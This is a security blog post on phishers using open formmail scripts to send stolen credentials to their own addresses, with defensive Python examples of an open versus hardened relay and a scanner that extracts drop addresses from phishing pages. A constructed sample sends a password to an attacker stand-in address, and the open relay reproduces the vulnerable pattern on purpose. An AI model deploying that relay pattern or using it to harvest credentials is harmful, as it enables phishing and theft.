The Cost of Open Formmail Scripts
Recently, some security colleagues posted a phishing URL that was using a formmail script to send victim data off to some email address. It’s a fairly common tactic, though rarer than the more usual method of using a PHP script on the same server as the web pages to generate an email.
Why do the bad guys do it this way? Generally because they’re using free web hosting to install phishing HTML pages, and the free hosting service does not support any server-side scripting such as PHP (or .NET, CGI, etc.). All the phishers have to do is upload the HTML files and point the forms at some other web site’s poorly configured formmail script. Voila! Insta-spoof!
So how often do phishers actually use a formmail script? PhishLabs set out to find out by reviewing the HTML source code of over 33,000 phish in our archives from the last 4 months. It turns out that, after ignoring botnet-hosted (e.g. fast-flux) phishing sites, formmail phish represent roughly 4% of attacks.
Unfortunately, the biggest facilitators are not “mom-and-pop” web sites but, in some instances, well-known companies. One of the world’s largest domain registrars has an ecommerce subsidiary with an open formmailer program that has helped at least 200 phishers over the last few months. ISPs, web hosters, and universities are also complicit in helping phishers.
By “back of the napkin” estimates, if each phish attack costs banks (and consumers) $1000, then ill-configured formmail programs are costing us all roughly $3 million per year.
Dear web developers: if you’re going to use a formmail script, check referrers (even though they can be spoofed) and hard-code the destination email address in the back-end script rather than allowing it to be passed by the web client. This is a strong tactic for spear phishing protection.
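To make the advice concrete, here is an added example (not code from PhishLabs or from any real formmail package) showing the two patterns side by side: an open form-to-email relay that lets the client pick the recipient, and a hardened one that hard-codes the destination and checks the Referer host. The destination address, the allowed referrer host and the field names that typical formmail scripts honour are assumptions for illustration, and the sample POST is constructed.

```python
import re
from typing import Mapping, Optional

# Hard-coded destination: the one thing the client must never be allowed to choose.
DESTINATION = "webmaster@example.com"            # assumed address, for illustration
ALLOWED_REFERRER_HOSTS = {"www.example.com"}     # assumed: the site(s) whose forms may use this relay
CLIENT_CONTROLLED = {"recipient", "recipients", "subject", "redirect"}  # assumed override fields


def open_formmail(fields: Mapping[str, str]) -> Optional[dict]:
    """The open pattern: whoever posts the form chooses where the data goes.
    A static phishing page hosted elsewhere just sets 'recipient' to a drop address."""
    recipient = fields.get("recipient")
    if not recipient:
        return None
    body = {k: v for k, v in fields.items() if k != "recipient"}
    return {"to": recipient, "body": body}


def referrer_host(headers: Mapping[str, str]) -> Optional[str]:
    """Host part of the Referer header, or None if it is absent or unparseable."""
    ref = headers.get("Referer")
    if not ref:
        return None
    m = re.match(r"^https?://([^/:?#]+)", ref, re.IGNORECASE)
    return m.group(1).lower() if m else None


def hardened_formmail(headers: Mapping[str, str], fields: Mapping[str, str]) -> Optional[dict]:
    """Hardened pattern: destination fixed server-side, Referer must be our own site.
    The Referer check only raises the bar (it can be spoofed, as the post says);
    hard-coding the destination is what makes the script useless as a relay."""
    if referrer_host(headers) not in ALLOWED_REFERRER_HOSTS:
        return None
    # Drop any recipient/subject/redirect override the client tries to pass.
    body = {k: v for k, v in fields.items() if k not in CLIENT_CONTROLLED}
    return {"to": DESTINATION, "body": body}


# Constructed sample: a POST as a phishing page on a free host would send it.
PHISH_POST = {
    "recipient": "drop@attacker.example",   # constructed drop address
    "username": "victim",
    "password": "hunter2",
}

if __name__ == "__main__":
    print("open:     ", open_formmail(PHISH_POST))
    print("hardened: ", hardened_formmail({"Referer": "http://free-host.example/login.html"}, PHISH_POST))
    print("own site: ", hardened_formmail({"Referer": "https://www.example.com/contact.html"}, PHISH_POST))
```

The open version relays the victim's data to whatever address the phisher put in the hidden field; the hardened version refuses the off-site post outright and, even for a post from the site's own pages, ignores the client-supplied recipient and delivers only to the fixed address.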
The silver lining is that the phishers’ email addresses are usually exposed in the HTML of the phishing site when they use this tactic. PhishLabs has turned over a list of 513 email addresses to ISP and law-enforcement cyber-crime investigators.
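Pulling those exposed addresses out of a page's HTML is mechanical, and the following added example (not PhishLabs' tooling) shows one way to do it: it walks the forms on a page, flags those whose action posts off-site to something that looks like a formmail handler, and collects the recipient addresses sitting in hidden fields. The recipient field names and handler-name fragments it looks for are assumptions, and the sample page is constructed to match the pattern the post describes.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed: field names common formmail scripts read the destination from.
RECIPIENT_FIELDS = {"recipient", "recipients", "to", "sendto", "email_to"}
# Assumed: name fragments that suggest a form-to-mail handler.
FORMMAIL_HINTS = ("formmail", "form-mail", "mailform", "sendmail")


class FormScanner(HTMLParser):
    """Collect every <form> on the page with its action and any recipient values."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            self._current = {"action": a.get("action", ""), "recipients": []}
        elif tag == "input" and self._current is not None:
            if a.get("name", "").lower() in RECIPIENT_FIELDS and a.get("value"):
                self._current["recipients"].append(a["value"])

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None


def find_formmail_relays(html, page_host):
    """Return forms that post off-site to something that looks like a formmail
    script, together with the drop addresses exposed in their hidden fields."""
    scanner = FormScanner()
    scanner.feed(html)
    scanner.close()
    hits = []
    for form in scanner.forms:
        action = form["action"]
        action_host = urlparse(action).netloc.lower()
        offsite = bool(action_host) and action_host != page_host.lower()
        looks_like_formmail = (any(h in action.lower() for h in FORMMAIL_HINTS)
                               or bool(form["recipients"]))
        if offsite and looks_like_formmail:
            hits.append({"relay": action, "recipients": form["recipients"]})
    return hits


# Constructed sample page modelled on the pattern the post describes (not a real phish).
SAMPLE_PAGE = """<html><body>
<form method="post" action="http://relay.example.net/cgi-bin/FormMail.pl">
  <input type="hidden" name="recipient" value="drop@mail.example">
  <input type="hidden" name="redirect" value="http://bank.example/">
  <input name="username"><input type="password" name="password">
  <input type="submit" value="Sign in">
</form>
<form method="post" action="/search"><input name="q"></form>
</body></html>"""

if __name__ == "__main__":
    for hit in find_formmail_relays(SAMPLE_PAGE, "free-host.example"):
        print(hit["relay"], "->", ", ".join(hit["recipients"]))
```

The off-site test is what separates a relay abuse from a site's own contact form: a form posting to the page's own host is left alone, while one posting to another host with a recipient field exposed is exactly the case where the address can be handed to the relay's operator and to investigators.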